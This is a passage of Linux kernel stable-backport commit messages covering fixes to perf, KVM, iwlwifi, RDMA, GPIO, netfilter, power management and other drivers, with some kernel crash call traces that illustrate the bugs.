Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 43b1f6abd5 upstream.
Drop the open-coded sched_clock() function and replace it by the provided
GENERIC_SCHED_CLOCK implementation. We have seen quite some hung tasks in the
past, which seem to be fixed by this patch.
Signed-off-by: Helge Deller <deller@gmx.de>
Signed-off-by: Helge Deller <deller@gmx.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ec638db8cb upstream.
Commit 3105f234e0 replaced module
cpu id table with a cpu feature check, which is logically correct.
But we need the module device table to allow module auto loading.
Fixes:3105f234 thermal/powerclamp: correct cpu support check
Signed-off-by: Jacob Pan <jacob.jun.pan@linux.intel.com>
Signed-off-by: Zhang Rui <rui.zhang@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b8000586c9 upstream.
Vince Weaver reported that perf_fuzzer + KASAN detects that PEBS event
unwinds sometimes do 'weird' things. In particular, we seemed to be
ending up unwinding from random places on the NMI stack.
While it was somewhat expected that the event record BP,SP would not
match the interrupt BP,SP in that the interrupt is strictly later than
the record event, it was overlooked that it could be on an already
overwritten stack.
Therefore, don't copy the recorded BP,SP over the interrupted BP,SP
when we need stack unwinds.
Note that its still possible the unwind doesn't full match the actual
event, as its entirely possible to have done an (I)RET between record
and interrupt, but on average it should still point in the general
direction of where the event came from. Also, it's the best we can do,
considering.
The particular scenario that triggered the bogus NMI stack unwind was
a PEBS event with very short period, upon enabling the event at the
tail of the PMI handler (FREEZE_ON_PMI is not used), it instantly
triggers a record (while still on the NMI stack) which in turn
triggers the next PMI. This then causes back-to-back NMIs and we'll
try and unwind the stack-frame from the last NMI, which obviously is
now overwritten by our own.
Analyzed-by: Josh Poimboeuf <jpoimboe@redhat.com>
Reported-by: Vince Weaver <vincent.weaver@maine.edu>
Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org>
Cc: Alexander Shishkin <alexander.shishkin@linux.intel.com>
Cc: Arnaldo Carvalho de Melo <acme@kernel.org>
Cc: Arnaldo Carvalho de Melo <acme@redhat.com>
Cc: Jiri Olsa <jolsa@redhat.com>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Stephane Eranian <eranian@gmail.com>
Cc: Stephane Eranian <eranian@google.com>
Cc: Thomas Gleixner <tglx@linutronix.de>
Cc: davej@codemonkey.org.uk <davej@codemonkey.org.uk>
Cc: dvyukov@google.com <dvyukov@google.com>
Fixes: ca037701a0 ("perf, x86: Add PEBS infrastructure")
Link: http://lkml.kernel.org/r/20161117171731.GV3157@twins.programming.kicks-ass.net
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit fc0e81b2be upstream.
On the 80486 DX, it seems that some exceptions may leave garbage in
the high bits of CS. This causes sporadic failures in which
early_fixup_exception() refuses to fix up an exception.
As far as I can tell, this has been buggy for a long time, but the
problem seems to have been exacerbated by commits:
1e02ce4ccc ("x86: Store a per-cpu shadow copy of CR4")
e1bfc11c5a ("x86/init: Fix cr4_init_shadow() on CR4-less machines")
This appears to have broken for as long as we've had early
exception handling.
[ Note to stable maintainers: This patch is needed all the way back to 3.4,
but it will only apply to 4.6 and up, as it depends on commit:
0e861fbb5b ("x86/head: Move early exception panic code into early_fixup_exception()")
If you want to backport to kernels before 4.6, please don't backport the
prerequisites (there was a big chain of them that rewrote a lot of the
early exception machinery); instead, ask me and I can send you a one-liner
that will apply. ]
Reported-by: Matthew Whitehead <tedheadster@gmail.com>
Signed-off-by: Andy Lutomirski <luto@kernel.org>
Cc: Borislav Petkov <bp@alien8.de>
Cc: Brian Gerst <brgerst@gmail.com>
Cc: Denys Vlasenko <dvlasenk@redhat.com>
Cc: H. Peter Anvin <hpa@zytor.com>
Cc: Josh Poimboeuf <jpoimboe@redhat.com>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Thomas Gleixner <tglx@linutronix.de>
Fixes: 4c5023a3fa ("x86-32: Handle exception table entries during early boot")
Link: http://lkml.kernel.org/r/cb32c69920e58a1a58e7b5cad975038a69c0ce7d.1479609510.git.luto@kernel.org
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d55b352b01 upstream.
A correct bugfix introduced a harmless warning that shows up with gcc-7:
fs/nfs/callback.c: In function 'nfs_callback_up':
fs/nfs/callback.c:214:14: error: array subscript is outside array bounds [-Werror=array-bounds]
What happens here is that the 'minorversion == 0' check tells the
compiler that we assume minorversion can be something other than 0,
but when CONFIG_NFS_V4_1 is disabled that would be invalid and
result in an out-of-bounds access.
The added check for IS_ENABLED(CONFIG_NFS_V4_1) tells gcc that this
really can't happen, which makes the code slightly smaller and also
avoids the warning.
The bugfix that introduced the warning is marked for stable backports,
we want this one backported to the same releases.
Fixes: 98b0f80c23 ("NFSv4.x: Fix a refcount leak in nfs_callback_up_net")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3d40658c97 upstream.
After a policy replacement, the task cred may be out of date and need
to be updated. However change_hat is using the stale profiles from
the out of date cred resulting in either: a stale profile being applied
or, incorrect failure when searching for a hat profile as it has been
migrated to the new parent profile.
Fixes: 01e2b670aa (failure to find hat)
Fixes: 898127c34e (stale policy being applied)
Bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1000287
Signed-off-by: John Johansen <john.johansen@canonical.com>
Signed-off-by: James Morris <james.l.morris@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9853a55ef1 upstream.
It's possible to make scanning consume almost arbitrary amounts
of memory, e.g. by sending beacon frames with random BSSIDs at
high rates while somebody is scanning.
Limit the number of BSS table entries we're willing to cache to
1000, limiting maximum memory usage to maybe 4-5MB, but lower
in practice - that would be the case for having both full-sized
beacon and probe response frames for each entry; this seems not
possible in practice, so a limit of 1000 entries will likely be
closer to 0.5 MB.
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e658a6f14d upstream.
For large values of "mult" and long uptimes, the intermediate
result of "cycles * mult" can overflow 64 bits. For example,
the tile platform calls clocksource_cyc2ns with a 1.2 GHz clock;
we have mult = 853, and after 208.5 days, we overflow 64 bits.
Since clocksource_cyc2ns() is intended to be used for relative
cycle counts, not absolute cycle counts, performance is more
importance than accepting a wider range of cycle values. So,
just use mult_frac() directly in tile's sched_clock().
Commit 4cecf6d401 ("sched, x86: Avoid unnecessary overflow
in sched_clock") by Salman Qazi results in essentially the same
generated code for x86 as this change does for tile. In fact,
a follow-on change by Salman introduced mult_frac() and switched
to using it, so the C code was largely identical at that point too.
Peter Zijlstra then added mul_u64_u32_shr() and switched x86
to use it. This is, in principle, better; by optimizing the
64x64->64 multiplies to be 32x32->64 multiplies we can potentially
save some time. However, the compiler piplines the 64x64->64
multiplies pretty well, and the conditional branch in the generic
mul_u64_u32_shr() causes some bubbles in execution, with the
result that it's pretty much a wash. If tilegx provided its own
implementation of mul_u64_u32_shr() without the conditional branch,
we could potentially save 3 cycles, but that seems like small gain
for a fair amount of additional build scaffolding; no other platform
currently provides a mul_u64_u32_shr() override, and tile doesn't
currently have an <asm/div64.h> header to put the override in.
Additionally, gcc currently has an optimization bug that prevents
it from recognizing the opportunity to use a 32x32->64 multiply,
and so the result would be no better than the existing mult_frac()
until such time as the compiler is fixed.
For now, just using mult_frac() seems like the right answer.
Signed-off-by: Chris Metcalf <cmetcalf@mellanox.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 18f6084a98 upstream.
This is a work around for a bug with LSI Fusion MPT SAS2 when perfoming
secure erase. Due to the very long time the operation takes, commands
issued during the erase will time out and will trigger execution of the
abort hook. Even though the abort hook is called for the specific
command which timed out, this leads to entire device halt
(scsi_state terminated) and premature termination of the secure erase.
Set device state to busy while ATA passthrough commands are in progress.
[mkp: hand applied to 4.9/scsi-fixes, tweaked patch description]
Signed-off-by: Andrey Grodzovsky <andrey2805@gmail.com>
Acked-by: Sreekanth Reddy <Sreekanth.Reddy@broadcom.com>
Cc: <linux-scsi@vger.kernel.org>
Cc: Sathya Prakash <sathya.prakash@broadcom.com>
Cc: Chaitra P B <chaitra.basappa@broadcom.com>
Cc: Suganath Prabu Subramani <suganath-prabu.subramani@broadcom.com>
Cc: Sreekanth Reddy <Sreekanth.Reddy@broadcom.com>
Cc: Hannes Reinecke <hare@suse.de>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2ce9d2272b upstream.
Some code (all error handling) submits CDBs that are allocated
on the stack. This breaks with CB/CBI code that tries to create
URB directly from SCSI command buffer - which happens to be in
vmalloced memory with vmalloced kernel stacks.
Let's make copy of the command in usb_stor_CB_transport.
Signed-off-by: Petr Vandrovec <petr@vandrovec.name>
Acked-by: Alan Stern <stern@rowland.harvard.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9bfef729a3 upstream.
This patch adds support for the TI CC3200 LaunchPad board, which uses a
custom USB vendor ID and product ID. Channel A is used for JTAG, and
channel B is used for a UART.
Signed-off-by: Doug Brown <doug@schmorgal.com>
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2ab13292d7 upstream.
The BRIM Brothers Zone DPMX is a bicycle powermeter. This ID is for the USB
serial interface in its charging dock for the control pods, via which some
settings for the pods can be modified.
Signed-off-by: Paul Jakma <paul@jakma.org>
Cc: Barry Redmond <barry@brimbrothers.com>
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2117d5398c upstream.
em_jmp_far and em_ret_far assumed that setting IP can only fail in 64
bit mode, but syzkaller proved otherwise (and SDM agrees).
Code segment was restored upon failure, but it was left uninitialized
outside of long mode, which could lead to a leak of host kernel stack.
We could have fixed that by always saving and restoring the CS, but we
take a simpler approach and just break any guest that manages to fail
as the error recovery is error-prone and modern CPUs don't need emulator
for this.
Found by syzkaller:
WARNING: CPU: 2 PID: 3668 at arch/x86/kvm/emulate.c:2217 em_ret_far+0x428/0x480
Kernel panic - not syncing: panic_on_warn set ...
CPU: 2 PID: 3668 Comm: syz-executor Not tainted 4.9.0-rc4+ #49
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
[...]
Call Trace:
[...] __dump_stack lib/dump_stack.c:15
[...] dump_stack+0xb3/0x118 lib/dump_stack.c:51
[...] panic+0x1b7/0x3a3 kernel/panic.c:179
[...] __warn+0x1c4/0x1e0 kernel/panic.c:542
[...] warn_slowpath_null+0x2c/0x40 kernel/panic.c:585
[...] em_ret_far+0x428/0x480 arch/x86/kvm/emulate.c:2217
[...] em_ret_far_imm+0x17/0x70 arch/x86/kvm/emulate.c:2227
[...] x86_emulate_insn+0x87a/0x3730 arch/x86/kvm/emulate.c:5294
[...] x86_emulate_instruction+0x520/0x1ba0 arch/x86/kvm/x86.c:5545
[...] emulate_instruction arch/x86/include/asm/kvm_host.h:1116
[...] complete_emulated_io arch/x86/kvm/x86.c:6870
[...] complete_emulated_mmio+0x4e9/0x710 arch/x86/kvm/x86.c:6934
[...] kvm_arch_vcpu_ioctl_run+0x3b7a/0x5a90 arch/x86/kvm/x86.c:6978
[...] kvm_vcpu_ioctl+0x61e/0xdd0 arch/x86/kvm/../../../virt/kvm/kvm_main.c:2557
[...] vfs_ioctl fs/ioctl.c:43
[...] do_vfs_ioctl+0x18c/0x1040 fs/ioctl.c:679
[...] SYSC_ioctl fs/ioctl.c:694
[...] SyS_ioctl+0x8f/0xc0 fs/ioctl.c:685
[...] entry_SYSCALL_64_fastpath+0x1f/0xc2
Reported-by: Dmitry Vyukov <dvyukov@google.com>
Fixes: d1442d85cc ("KVM: x86: Handle errors when RIP is set during far jumps")
Signed-off-by: Radim Krčmář <rkrcmar@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1c387188c6 upstream.
The VT-d specification (§8.3.3) says:
‘Virtual Functions’ of a ‘Physical Function’ are under the scope
of the same remapping unit as the ‘Physical Function’.
The BIOS is not required to list all the possible VFs in the scope
tables, and arguably *shouldn't* make any attempt to do so, since there
could be a huge number of them.
This has been broken basically for ever — the VF is never going to match
against a specific unit's scope, so it ends up being assigned to the
INCLUDE_ALL IOMMU. Which was always actually correct by coincidence, but
now we're looking at Root-Complex integrated devices with SR-IOV support
it's going to start being wrong.
Fix it to simply use pci_physfn() before doing the lookup for PCI devices.
Signed-off-by: Sainath Grandhi <sainath.grandhi@intel.com>
Signed-off-by: Ashok Raj <ashok.raj@intel.com>
Signed-off-by: David Woodhouse <dwmw2@infradead.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9101704429 upstream.
Somehow I ended up with an off-by-three error in calculating the size of
the PASID and PASID State tables, which triggers allocations failures as
those tables unfortunately have to be physically contiguous.
In fact, even the *correct* maximum size of 8MiB is problematic and is
wont to lead to allocation failures. Since I have extracted a promise
that this *will* be fixed in hardware, I'm happy to limit it on the
current hardware to a maximum of 0x20000 PASIDs, which gives us 1MiB
tables — still not ideal, but better than before.
Reported by Mika Kuoppala <mika.kuoppala@linux.intel.com> and also by
Xunlei Pang <xlpang@redhat.com> who submitted a simpler patch to fix
only the allocation (and not the free) to the "correct" limit... which
was still problematic.
Signed-off-by: David Woodhouse <dwmw2@infradead.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 53f8d32223 upstream.
gpiod_set_array_value_complex does not clear the bits field.
Therefore when the drivers set_multiple funciton is called bits outside
the mask are undefined and can be either set or not. So bank_val needs
to be masked with bank_mask before or with the reg_val cache.
Fixes: b4818afeac ("gpio: pca953x: Add set_multiple to allow multiple")
Signed-off-by: Phil Reid <preid@electromag.com.au>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 386377b547 upstream.
Need to ensure that reg_output is not updated while setting multiple
bits. This makes the mutex locking behaviour for the set_multiple call
consistent with that of the set_value call.
Fixes: b4818afeac ("gpio: pca953x: Add set_multiple to allow multiple")
Signed-off-by: Phil Reid <preid@electromag.com.au>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a8b1e36d0d upstream.
With HZ=100 element timeout in dynamic sets (i.e. flow tables) is 10 times
higher than configured.
Add proper conversion to/from jiffies, when interacting with userspace.
I tested this on Linux 4.8.1, and it applies cleanly to current nf and
nf-next trees.
Fixes: 22fe54d5fe ("netfilter: nf_tables: add support for dynamic set updates")
Signed-off-by: Anders K. Pedersen <akp@cohaesio.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9db0ff53cb upstream.
When there is a CM id object that has port assigned to it, it means that
the cm-id asked for the specific port that it should go by it, but if
that port was removed (hot-unplug event) the cm-id was not updated.
In order to fix that the port keeps a list of all the cm-id's that are
planning to go by it, whenever the port is removed it marks all of them
as invalid.
This commit fixes a kernel panic which happens when running traffic between
guests and we force reboot a guest mid traffic, it triggers a kernel panic:
Call Trace:
[<ffffffff815271fa>] ? panic+0xa7/0x16f
[<ffffffff8152b534>] ? oops_end+0xe4/0x100
[<ffffffff8104a00b>] ? no_context+0xfb/0x260
[<ffffffff81084db2>] ? del_timer_sync+0x22/0x30
[<ffffffff8104a295>] ? __bad_area_nosemaphore+0x125/0x1e0
[<ffffffff81084240>] ? process_timeout+0x0/0x10
[<ffffffff8104a363>] ? bad_area_nosemaphore+0x13/0x20
[<ffffffff8104aabf>] ? __do_page_fault+0x31f/0x480
[<ffffffff81065df0>] ? default_wake_function+0x0/0x20
[<ffffffffa0752675>] ? free_msg+0x55/0x70 [mlx5_core]
[<ffffffffa0753434>] ? cmd_exec+0x124/0x840 [mlx5_core]
[<ffffffff8105a924>] ? find_busiest_group+0x244/0x9f0
[<ffffffff8152d45e>] ? do_page_fault+0x3e/0xa0
[<ffffffff8152a815>] ? page_fault+0x25/0x30
[<ffffffffa024da25>] ? cm_alloc_msg+0x35/0xc0 [ib_cm]
[<ffffffffa024e821>] ? ib_send_cm_dreq+0xb1/0x1e0 [ib_cm]
[<ffffffffa024f836>] ? cm_destroy_id+0x176/0x320 [ib_cm]
[<ffffffffa024fb00>] ? ib_destroy_cm_id+0x10/0x20 [ib_cm]
[<ffffffffa034f527>] ? ipoib_cm_free_rx_reap_list+0xa7/0x110 [ib_ipoib]
[<ffffffffa034f590>] ? ipoib_cm_rx_reap+0x0/0x20 [ib_ipoib]
[<ffffffffa034f5a5>] ? ipoib_cm_rx_reap+0x15/0x20 [ib_ipoib]
[<ffffffff81094d20>] ? worker_thread+0x170/0x2a0
[<ffffffff8109b2a0>] ? autoremove_wake_function+0x0/0x40
[<ffffffff81094bb0>] ? worker_thread+0x0/0x2a0
[<ffffffff8109aef6>] ? kthread+0x96/0xa0
[<ffffffff8100c20a>] ? child_rip+0xa/0x20
[<ffffffff8109ae60>] ? kthread+0x0/0xa0
[<ffffffff8100c200>] ? child_rip+0x0/0x20
Fixes: a977049dac ("[PATCH] IB: Add the kernel CM implementation")
Signed-off-by: Mark Bloch <markb@mellanox.com>
Signed-off-by: Erez Shitrit <erezsh@mellanox.com>
Reviewed-by: Maor Gottlieb <maorg@mellanox.com>
Signed-off-by: Leon Romanovsky <leon@kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5b810a242c upstream.
The real QP is destroyed in case of the ref count reaches zero, but
for XRC target QPs this call was missed and caused to QP leaks.
Let's call to destroy for all flows.
Fixes: 0e0ec7e063 ('RDMA/core: Export ib_open_qp() to share XRC...')
Signed-off-by: Tariq Toukan <tariqt@mellanox.com>
Signed-off-by: Noa Osherovich <noaos@mellanox.com>
Signed-off-by: Leon Romanovsky <leon@kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3c7ba5760a upstream.
sg_alloc_table gets unsigned int as parameter while the driver
returns it as size_t. Check npages isn't greater than maximum
unsigned int.
Fixes: eeb8461e36 ("IB: Refactor umem to use linear SG table")
Signed-off-by: Mark Bloch <markb@mellanox.com>
Signed-off-by: Maor Gottlieb <maorg@mellanox.com>
Signed-off-by: Leon Romanovsky <leon@kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit dbaaff2a2c upstream.
When an internal error condition is detected, make sure to set the
device inactive after dispatching the event so ULPs can get a
notification of this event.
Fixes: e126ba97db ('mlx5: Add driver for Mellanox Connect-IB adapters')
Signed-off-by: Eli Cohen <eli@mellanox.com>
Signed-off-by: Maor Gottlieb <maorg@mellanox.com>
Reviewed-by: Mohamad Haj Yahia <mohamad@mellanox.com>
Signed-off-by: Leon Romanovsky <leon@kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 16b0e0695a upstream.
When creating kernel CQs use 128B CQE stride if the
cache line size is 128B, 64B otherwise. This prevents
multiple CQEs from residing in a 128B cache line,
which can cause retries when there are concurrent
read and writes in one cache line.
Tested with IPoIB on PPC64, saw ~5% throughput
improvement.
Fixes: e126ba97db ('mlx5: Add driver for Mellanox Connect-IB adapters')
Signed-off-by: Daniel Jurgens <danielj@mellanox.com>
Signed-off-by: Maor Gottlieb <maorg@mellanox.com>
Signed-off-by: Leon Romanovsky <leon@kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit aa75b07b47 upstream.
RXE resets the send-q only once in rxe_qp_init_req() when
QP is created, but when the QP is reused after QP reset, the send-q
holds previous garbage data.
This garbage data wrongly fails CQEs that otherwise
should have completed successfully.
Fixes: 8700e3e7c4 ("Soft RoCE driver")
Signed-off-by: Yonatan Cohen <yonatanc@mellanox.com>
Reviewed-by: Moni Shoua <monis@mellanox.com>
Signed-off-by: Leon Romanovsky <leon@kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 002e062e13 upstream.
To correctly handle a erroneous WR this fix does the following
1. Make sure the bad WQE causes a user completion event.
2. Call rxe_completer to handle the erred WQE.
Before the fix, when rxe_requester found a bad WQE, it changed its
status to IB_WC_LOC_PROT_ERR and exit with 0 for non RC QPs.
If this was the 1st WQE then there would be no ACK to invoke the
completer and this bad WQE would be stuck in the QP's send-q.
On top of that the requester exiting with 0 caused rxe_do_task to
endlessly invoke rxe_requester, resulting in a soft-lockup attached
below.
In case the WQE was not the 1st and rxe_completer did get a chance to
handle the bad WQE, it did not cause a complete event since the WQE's
IB_SEND_SIGNALED flag was not set.
Setting WQE status to IB_SEND_SIGNALED is subject to IBA spec
version 1.2.1, section 10.7.3.1 Signaled Completions.
NMI watchdog: BUG: soft lockup - CPU#7 stuck for 22s!
[<ffffffffa0590145>] ? rxe_pool_get_index+0x35/0xb0 [rdma_rxe]
[<ffffffffa05952ec>] lookup_mem+0x3c/0xc0 [rdma_rxe]
[<ffffffffa0595534>] copy_data+0x1c4/0x230 [rdma_rxe]
[<ffffffffa058c180>] rxe_requester+0x9d0/0x1100 [rdma_rxe]
[<ffffffff8158e98a>] ? kfree_skbmem+0x5a/0x60
[<ffffffffa05962c9>] rxe_do_task+0x89/0xf0 [rdma_rxe]
[<ffffffffa05963e2>] rxe_run_task+0x12/0x30 [rdma_rxe]
[<ffffffffa059110a>] rxe_post_send+0x41a/0x550 [rdma_rxe]
[<ffffffff811ef922>] ? __kmalloc+0x182/0x200
[<ffffffff816ba512>] ? down_read+0x12/0x40
[<ffffffffa054bd32>] ib_uverbs_post_send+0x532/0x540 [ib_uverbs]
[<ffffffff815f8722>] ? tcp_sendmsg+0x402/0xb80
[<ffffffffa05453dc>] ib_uverbs_write+0x18c/0x3f0 [ib_uverbs]
[<ffffffff81623c2e>] ? inet_recvmsg+0x7e/0xb0
[<ffffffff8158764d>] ? sock_recvmsg+0x3d/0x50
[<ffffffff81215b87>] __vfs_write+0x37/0x140
[<ffffffff81216892>] vfs_write+0xb2/0x1b0
[<ffffffff81217ce5>] SyS_write+0x55/0xc0
[<ffffffff816bc672>] entry_SYSCALL_64_fastpath+0x1a/0xa
Fixes: 8700e3e7c4 ("Soft RoCE driver")
Signed-off-by: Yonatan Cohen <yonatanc@mellanox.com>
Reviewed-by: Moni Shoua <monis@mellanox.com>
Signed-off-by: Leon Romanovsky <leon@kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6d931308f5 upstream.
The method rxe_qp_error() transitions QP to error state
and make sure the QP is drained. It did not though update
the QP state for user's query.
This patch fixes this.
Fixes: 8700e3e7c4 ("Soft RoCE driver")
Signed-off-by: Yonatan Cohen <yonatanc@mellanox.com>
Reviewed-by: Moni Shoua <monis@mellanox.com>
Signed-off-by: Leon Romanovsky <leon@kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c72ab446ca upstream.
Markus reported that there's a weird behavior on perf top --hierarchy
regarding the column length.
Looking at the code, I found a dubious code which affects the symptoms.
When --hierarchy option is used, the last column length might be
inaccurate since it skips to update the length on leaf entries.
I cannot remember why it did and looks like a leftover from previous
version during the development.
Anyway, updating the column length often is not harmful. So let's move
the code out.
Reported-and-Tested-by: Markus Trippelsdorf <markus@trippelsdorf.de>
Signed-off-by: Namhyung Kim <namhyung@kernel.org>
Cc: Jiri Olsa <jolsa@kernel.org>
Cc: Peter Zijlstra <peterz@infradead.org>
Fixes: 1a3906a7e6 ("perf hists: Resort hist entries with hierarchy")
Link: http://lkml.kernel.org/r/20161108130833.9263-5-namhyung@kernel.org
Signed-off-by: Arnaldo Carvalho de Melo <acme@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6f75c3fd56 upstream.
Consider two devices, A and B, where B is a child of A, and B utilizes
asynchronous suspend (it does not matter whether A is sync or async). If
B fails to suspend_noirq() or suspend_late(), or is interrupted by a
wakeup (pm_wakeup_pending()), then it aborts and sets the async_error
variable. However, device A does not (immediately) check the async_error
variable; it may continue to run its own suspend_noirq()/suspend_late()
callback. This is bad.
We can resolve this problem by doing our error and wakeup checking
(particularly, for the async_error flag) after waiting for children to
suspend, instead of before. This also helps align the logic for the noirq and
late suspend cases with the logic in __device_suspend().
It's easy to observe this erroneous behavior by, for example, forcing a
device to sleep a bit in its suspend_noirq() (to ensure the parent is
waiting for the child to complete), then return an error, and watch the
parent suspend_noirq() still get called. (Or similarly, fake a wakeup
event at the right (or is it wrong?) time.)
Fixes: de377b3972 (PM / sleep: Asynchronous threads for suspend_late)
Fixes: 28b6fd6e37 (PM / sleep: Asynchronous threads for suspend_noirq)
Reported-by: Jeffy Chen <jeffy.chen@rock-chips.com>
Signed-off-by: Brian Norris <briannorris@chromium.org>
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d6124b409c upstream.
This subsystem consistently fails to drop the device reference taken by
class_find_device().
Note that some of these lookup functions already take a reference to the
returned data, while others claim no reference is needed (or does not
seem need one).
Fixes: 183b9b592a ("uwb: add the UWB stack (core files)")
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 722f191080 upstream.
Make sure to drop the reference taken by bus_find_device_by_name()
before returning from mfd_clone_cell().
Fixes: a9bbba9963 ("mfd: add platform_device sharing support for mfd")
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Lee Jones <lee.jones@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3a732c65de upstream.
When we sync the RX queues the driver waits to receive echo
notification on all the RX queues.
The wait queue is set with timeout until all queues have received
the notification.
However, iwl_mvm_rx_queue_notif() never woke up the wait queue,
with the result of the counter value being checked only when the
timeout expired.
This may cause a latency of up to 1 second.
Fixes: 0636b93821 ("iwlwifi: mvm: implement driver RX queues sync command")
Signed-off-by: Sara Sharon <sara.sharon@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 85cd69b8f1 upstream.
When a unified D0/D3 image is used, we don't restart the FW in the
D0->D3->D0 transitions. Therefore, the d3_test functionality should
not call ieee8021_restart_hw() when the resuming either.
Fixes: commit 23ae61282b ("iwlwifi: mvm: Do not switch to D3 image on suspend")
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5a143db8c4 upstream.
With unified images, we need to make sure the net-detect scan is
stopped after resuming, since we don't restart the FW. Also, we need
to make sure we check if there are enough scan slots available to run
it, as we do with other scans.
Fixes: commit 23ae61282b ("iwlwifi: mvm: Do not switch to D3 image on suspend")
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit faead41cc7 upstream.
Emmanuel reports that when CMD_WANT_ASYNC_CALLBACK is used by mvm,
the callback will be called with the command queue lock held, and
mvm will try to stop all (other) TX queues, which acquires their
locks - this caused a false lockdep recursive locking report.
Suppress this report by marking the command queue lock with a new,
separate, lock class so lockdep can tell the difference between
the two types of queues.
Fixes: 156f92f2b4 ("iwlwifi: block the queues when we send ADD_STA for uAPSD")
Reported-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e0d9727c11 upstream.
The SPLC data parsing is too restrictive and was not trying find the
correct element for WiFi. This causes problems with some BIOSes where
the SPLC method exists, but doesn't have a WiFi entry on the first
element of the list. The domain type values are also incorrect
according to the specification.
Fix this by complying with the actual specification.
Additionally, replace all occurrences of SPLX to SPLC, since SPLX is
only a structure internal to the ACPI tables, and may not even exist.
Fixes: bcb079a14d ("iwlwifi: pcie: retrieve and parse ACPI power limitations")
Reported-by: Chris Rorvick <chris@rorvick.com>
Tested-by: Paul Bolle <pebolle@tiscali.nl>
Tested-by: Chris Rorvick <chris@rorvick.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5c2f117a22 upstream.
Since 'parent_rate * mfn' may overflow 32 bits, the result should be
stored using 64 bits.
The problem was discovered when trying to set the rate of the audio PLL
(pll4_post_div) on an i.MX6Q. The desired rate was 196.608 MHz, but
the actual rate returned was 192.000570 MHz. The round rate function should
have been able to return 196.608 MHz, i.e., the desired rate.
